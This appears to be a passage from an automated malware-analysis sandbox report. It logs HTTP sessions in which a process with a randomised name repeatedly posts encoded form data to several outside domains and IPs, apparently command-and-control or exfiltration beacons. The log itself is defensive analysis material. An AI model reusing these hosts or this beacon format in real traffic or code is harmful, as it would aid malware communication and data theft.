                                                                                        Data Raw: 41 36 30 64 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 6e 78 6c 48 74 5a 33 76 73 36 69 30 43 5a 49 6e 52 2b 67 4a 68 56 71 39 63 53 76 51 4a 77 46 6e 47 6e 6a 69 78 71 33 75 31 79 4e 70 6b 30 77 67 6e 71 79 61 73 49 63 71 68 71 31 4a 49 37 4e 4a 67 37 33 68 61 75 52 57 66 6d 43 53 57 77 74 48 41 4c 4a 68 46 4a 6d 48 51 39 61 66 64 4f 50 62 47 62 37 6c 2b 43 63 6d 38 4c 4e 4b 57 6d 48 6e 71 61 71 49 6e 6f 56 51 70 69 2b 6f 79 69 6b 4b 71 4d 59 66 62 64 66 32 2b 4e 78 43 67 74 50 79 2f 50 6b 30 6b 67 36 55 47 57 64 39 51 65 6d 66 6a 58 33 2f 63 41 75 35 61 44 6a 6e 74 69 43 32 34 33 2f 6d 6c 65 2b 59 35 67 35 69 4d 63 70 34 37 48 52 32 69 5a 63 42 4c 2b 37 2b 5a 73 2f 4b 4d 4c 76 68 78 36 46 70 4e 45 6a 39 6d 50 70 4a 43 6f 74 5a 44 50 6f 66 37 67 77 51 62 57 34 70 69 42 4d 56 76 69 33 34 69 56 73 4c 4c 4f 73 55 61 63 76 36 50 36 46 6b 45 46 67 4d 58 66 4d 49 4d 6c 73 59 42 54 6d 6f 78 7a 7a 4f 65 75 47 48 58 65 2f [TRUNCATED]
                                                                                        Data Ascii: A60d= [TRUNCATED]
                                                                                        Nov 6, 2024 16:02:04.362221956 CET | 390 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:04 GMT
                                                                                        Server: Apache
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Encoding: gzip
                                                                                        Content-Length: 179
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                                        Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        40 | 192.168.2.8 | 49748 | 47.52.221.8 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:02:05.939378023 CET | 380 | OUT | GET /9ezc/?QftlZ=CnaPg8j&A60d=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+Pd9/3gTJl/Aqae97oJsSOpJi/Ea/U3//DCXx5U5lNSou+g== HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.wukong.college
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:02:07.114680052 CET | 390 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:06 GMT
                                                                                        Server: Apache
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Length: 203
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 65 7a 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9ezc/ was not found on this server.</p></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        41 | 192.168.2.8 | 49749 | 23.106.59.18 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:02:12.236635923 CET | 660 | OUT | POST /95c0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.vehiculargustav.click
                                                                                        Origin: http://www.vehiculargustav.click
                                                                                        Referer: http://www.vehiculargustav.click/95c0/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 4f 76 55 72 47 31 59 43 64 37 6a 38 53 50 2b 61 51 73 71 4b 54 6a 4d 4e 70 43 32 50 48 48 6e 6a 34 4a 55 45 68 7a 41 70 78 7a 52 4e 6e 38 30 76 59 79 31 34 4b 59 35 45 2f 64 6c 48 39 64 6c 72 35 55 62 42 41 46 33 34 59 66 64 2f 6d 57 34 45 30 59 61 50 65 61 67 33 30 4d 50 78 71 49 74 56 47 34 37 5a 4e 62 45 63 68 71 54 62 47 46 69 67 68 67 6c 6d 66 6f 6c 36 2f 4c 4f 44 6f 70 32 68 32 43 2b 6f 62 41 75 37 68 45 2b 66 45 78 4f 47 67 42 35 4c 6c 39 75 2b 4b 76 36 37 41 57 35 63 30 66 30 7a 74 6e 2b 45 45 68 4d 52 77 79 6b 4c 6b 39 71 45 46 4a 34 77 32 61 77 3d
                                                                                        Data Ascii: A60d=5oZRZJtRgbXMOvUrG1YCd7j8SP+aQsqKTjMNpC2PHHnj4JUEhzApxzRNn80vYy14KY5E/dlH9dlr5UbBAF34Yfd/mW4E0YaPeag30MPxqItVG47ZNbEchqTbGFighglmfol6/LODop2h2C+obAu7hE+fExOGgB5Ll9u+Kv67AW5c0f0ztn+EEhMRwykLk9qEFJ4w2aw=
                                                                                        Nov 6, 2024 16:02:13.027827024 CET | 423 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:12 GMT
                                                                                        Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                        Content-Length: 203
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        42 | 192.168.2.8 | 49750 | 23.106.59.18 | 80 | 5188 | C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Nov 6, 2024 16:02:14.789623022 CET | 680 | OUT | POST /95c0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.vehiculargustav.click
                                                                                        Origin: http://www.vehiculargustav.click
                                                                                        Referer: http://www.vehiculargustav.click/95c0/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 50 50 6b 72 48 55 59 43 66 62 6a 2f 4f 66 2b 61 61 4d 72 69 54 6a 49 4e 70 44 79 6c 48 31 54 6a 39 64 59 45 67 79 41 70 39 54 52 4e 76 63 30 6d 56 53 31 7a 4b 59 31 69 2f 59 46 48 39 64 5a 72 35 52 6e 42 63 69 44 33 5a 50 64 78 74 32 34 43 70 49 61 50 65 61 67 33 30 49 66 4c 71 49 31 56 47 49 4c 5a 4d 36 45 62 76 4b 54 59 48 46 69 67 6c 67 6c 69 66 6f 6c 45 2f 4a 37 4c 6f 73 36 68 32 44 4f 6f 61 53 4b 36 75 45 2b 64 41 78 50 6b 6b 7a 30 63 2f 4d 54 65 52 50 57 4b 46 48 6c 50 34 4a 46 5a 33 46 32 43 48 68 6b 36 77 78 4d 39 68 4b 33 73 66 71 6f 41 6f 4e 6e 35 75 2f 4a 7a 47 79 52 74 79 73 56 44 73 63 58 72 54 45 66 33
                                                                                        Data Ascii: A60d=5oZRZJtRgbXMPPkrHUYCfbj/Of+aaMriTjINpDylH1Tj9dYEgyAp9TRNvc0mVS1zKY1i/YFH9dZr5RnBciD3ZPdxt24CpIaPeag30IfLqI1VGILZM6EbvKTYHFiglglifolE/J7Los6h2DOoaSK6uE+dAxPkkz0c/MTeRPWKFHlP4JFZ3F2CHhk6wxM9hK3sfqoAoNn5u/JzGyRtysVDscXrTEf3
                                                                                         Nov 6, 2024 16:02:15.593745947 CET | 423 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:14 GMT
                                                                                        Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                        Content-Length: 203
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                         Session ID: 43 | Source IP: 192.168.2.8 | Source Port: 49751 | Destination IP: 23.106.59.18 | Destination Port: 80 | PID: 5188 | Process: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:02:17.341619015 CET | 1697 | OUT | POST /95c0/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.vehiculargustav.click
                                                                                        Origin: http://www.vehiculargustav.click
                                                                                        Referer: http://www.vehiculargustav.click/95c0/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 50 50 6b 72 48 55 59 43 66 62 6a 2f 4f 66 2b 61 61 4d 72 69 54 6a 49 4e 70 44 79 6c 48 31 4c 6a 68 2b 51 45 76 78 59 70 2b 54 52 4e 77 73 30 6a 56 53 31 55 4b 59 74 2b 2f 59 41 79 39 59 56 72 34 7a 66 42 51 48 76 33 58 50 64 78 77 6d 34 44 30 59 62 56 65 61 77 7a 30 4d 44 4c 71 49 31 56 47 4c 54 5a 4c 72 45 62 74 4b 54 62 47 46 69 6b 68 67 6c 4b 66 6f 73 2f 2f 4a 76 62 6f 66 79 68 34 44 65 6f 63 67 53 36 78 30 2b 44 4e 52 50 43 6b 7a 35 62 2f 50 6d 76 52 50 53 73 46 47 52 50 36 39 51 64 6e 45 32 4c 46 69 45 7a 6f 79 55 56 6f 35 4c 55 56 61 6f 34 6b 4e 76 43 67 4c 51 54 44 78 78 6e 39 75 30 39 31 4e 72 63 66 45 69 30 44 36 35 39 50 44 69 38 6b 42 4e 75 70 55 39 65 66 6a 4d 51 63 35 75 36 6a 6d 45 52 6e 6f 55 69 42 70 5a 4b 63 4f 6d 38 64 61 6e 37 32 38 69 56 74 5a 6e 4f 63 71 70 32 74 7a 47 62 77 33 53 4e 53 76 30 6a 42 54 36 38 66 7a 39 4c 44 64 4c 70 2f 58 51 52 42 62 2b 44 32 65 56 62 7a 59 2b 6c 36 36 74 65 6b 77 6b 77 67 32 51 42 2f 6b 6e 39 44 [TRUNCATED]
                                                                                        Data Ascii: A60d=5oZRZJtRgbXMPPkrHUYCfbj/Of+aaMriTjINpDylH1Ljh+QEvxYp+TRNws0jVS1UKYt+/YAy9YVr4zfBQHv3XPdxwm4D0YbVeawz0MDLqI1VGLTZLrEbtKTbGFikhglKfos//Jvbofyh4DeocgS6x0+DNRPCkz5b/PmvRPSsFGRP69QdnE2LFiEzoyUVo5LUVao4kNvCgLQTDxxn9u091NrcfEi0D659PDi8kBNupU9efjMQc5u6jmERnoUiBpZKcOm8dan728iVtZnOcqp2tzGbw3SNSv0jBT68fz9LDdLp/XQRBb+D2eVbzY+l66tekwkwg2QB/kn9DDaZmlZf5RAwaKsQNudRV+581HMJzp6U1coTJgSa4HEjNimGmxkXXcCIOfHqdJ3ObWOZY7xXEvlJQ91dsNFIgxOvdCeTCogYDrhO0odFP80qXy7BXqXD+mW30Ae6mQZDd4dEciPpC0iX8f+F3rqR/IUMP/G2lXOiFhUozQ+zGx8SabykCqj3Ane+9+GJRtdnNGiYc1RPGFjdLvVmo2MLEl3Yy7gSt/kJZS8ggBJiGEsS7jkZcGnOPkcXXpezYKCVjxM3DBdbhhgbT5OuGusaAA9trCkW5PYul6Lmjo9QVCbvYgiOfqlRDPTRh5yEhrhlSzBheDxMM+fYfn/KhLyBVRzIMegLFNqEqZaZnT5FX0cNqi/JXnerUjKC9HwAaNs14qlZzlpU8iPNnphiqRsSJUeHvrXOPvsgM4oEEUL1Gstk5QV9lWmtisS1YRhxKbuuL9tWjejovZXinNOIoEaHlEQcT5wpIFKeDnoYnDSUGCKVyAqYcdWtQDcfXyL3RTYn0AKQy7rxerWhMMM0Z/3kJa4aRrYxKyTaXMhZZmM8+oYGi+JP1v2JbpMeM7bpqJ1wOKd6Tcj6SeyUDPR48m0CoJiWyakXc6/1aP7TQLwvQM9tOOjHZimE8GZgN/KeCbbr3A85WQ2kKKzM11c2H53sbaggPPx0nab6EIv [TRUNCATED]
                                                                                         Nov 6, 2024 16:02:18.151864052 CET | 423 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:17 GMT
                                                                                        Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                        Content-Length: 203
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                         Session ID: 44 | Source IP: 192.168.2.8 | Source Port: 49752 | Destination IP: 23.106.59.18 | Destination Port: 80 | PID: 5188 | Process: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:02:19.900156021 CET | 387 | OUT | GET /95c0/?A60d=0qxxa8sZzaTQGsV+IlYRUJribMqFDMjNP0hPtjDvBTL1oNFysxcHk25mntsLFh1aL6dJocQb44ZX+yLzRXP4WstlnU8yga+uYMkloLbvjpkOD6D/HpsAt4GJWXyRqysedQ==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.vehiculargustav.click
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                         Nov 6, 2024 16:02:20.672406912 CET | 423 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:20 GMT
                                                                                        Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                        Content-Length: 203
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                         Session ID: 45 | Source IP: 192.168.2.8 | Source Port: 49753 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 5188 | Process: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:02:34.262506008 CET | 642 | OUT | POST /fjsq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.yushaliu.online
                                                                                        Origin: http://www.yushaliu.online
                                                                                        Referer: http://www.yushaliu.online/fjsq/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 4c 72 78 4c 62 6d 32 50 64 4b 4c 69 77 46 2b 79 72 50 58 49 58 2b 77 63 6e 7a 78 31 58 6b 62 41 35 4b 54 76 68 4a 46 58 39 44 49 66 36 41 56 4a 36 72 73 6e 48 58 39 44 6e 4a 78 6c 55 67 51 46 55 4b 71 41 72 70 66 4e 6c 4e 74 6e 7a 45 63 6d 72 43 2b 5a 53 47 61 49 55 71 66 61 43 44 63 34 4c 4c 63 58 76 55 79 39 4f 42 30 30 42 4e 75 35 6d 34 67 78 41 7a 55 43 61 58 45 69 2f 4a 46 74 79 48 49 50 6a 41 4c 45 7a 45 47 71 63 51 79 42 6b 34 33 54 6b 53 39 49 48 2b 69 30 6c 4c 66 6e 6e 39 32 4f 67 6e 45 33 69 44 50 30 72 42 4b 7a 33 73 6d 2b 7a 78 43 61 4d 49 4f 4c 4a 48 46 66 52 4d 39 50 41 63 59 3d
                                                                                        Data Ascii: A60d=LrxLbm2PdKLiwF+yrPXIX+wcnzx1XkbA5KTvhJFX9DIf6AVJ6rsnHX9DnJxlUgQFUKqArpfNlNtnzEcmrC+ZSGaIUqfaCDc4LLcXvUy9OB00BNu5m4gxAzUCaXEi/JFtyHIPjALEzEGqcQyBk43TkS9IH+i0lLfnn92OgnE3iDP0rBKz3sm+zxCaMIOLJHFfRM9PAcY=


                                                                                         Session ID: 46 | Source IP: 192.168.2.8 | Source Port: 49754 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 5188 | Process: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:02:36.825593948 CET | 662 | OUT | POST /fjsq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.yushaliu.online
                                                                                        Origin: http://www.yushaliu.online
                                                                                        Referer: http://www.yushaliu.online/fjsq/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 4c 72 78 4c 62 6d 32 50 64 4b 4c 69 69 77 75 79 6f 6f 72 49 66 2b 77 64 6f 54 78 31 43 30 61 4a 35 4b 66 76 68 4d 38 4b 39 51 67 66 36 67 6c 4a 6f 2f 41 6e 45 58 39 44 73 70 78 6b 61 41 51 65 55 4b 6d 79 72 73 2f 4e 6c 4a 4e 6e 7a 45 73 6d 72 53 43 65 53 57 61 4b 42 36 66 59 47 44 63 34 4c 4c 63 58 76 55 33 71 4f 43 45 30 42 39 2b 35 6c 5a 67 32 44 7a 55 44 64 58 45 69 75 5a 46 70 79 48 4a 63 6a 42 58 69 7a 47 2b 71 63 52 69 42 6b 74 62 51 75 53 39 4f 5a 4f 6a 72 6c 5a 69 41 6c 66 4f 52 74 6d 31 52 6d 46 2f 42 71 33 37 5a 74 4f 75 34 77 78 71 78 4d 4c 6d 39 4d 77 59 33 4c 76 74 2f 65 4c 50 61 4b 47 57 62 4a 43 78 70 35 4c 68 4d 38 51 6b 38 38 31 76 72
                                                                                        Data Ascii: A60d=LrxLbm2PdKLiiwuyoorIf+wdoTx1C0aJ5KfvhM8K9Qgf6glJo/AnEX9DspxkaAQeUKmyrs/NlJNnzEsmrSCeSWaKB6fYGDc4LLcXvU3qOCE0B9+5lZg2DzUDdXEiuZFpyHJcjBXizG+qcRiBktbQuS9OZOjrlZiAlfORtm1RmF/Bq37ZtOu4wxqxMLm9MwY3Lvt/eLPaKGWbJCxp5LhM8Qk881vr


                                                                                         Session ID: 47 | Source IP: 192.168.2.8 | Source Port: 49755 | Destination IP: 208.91.197.27 | Destination Port: 80 | PID: 5188 | Process: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                         Timestamp | Bytes transferred | Direction | Data
                                                                                         Nov 6, 2024 16:02:39.363594055 CET | 1679 | OUT | POST /fjsq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.yushaliu.online
                                                                                        Origin: http://www.yushaliu.online
                                                                                        Referer: http://www.yushaliu.online/fjsq/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
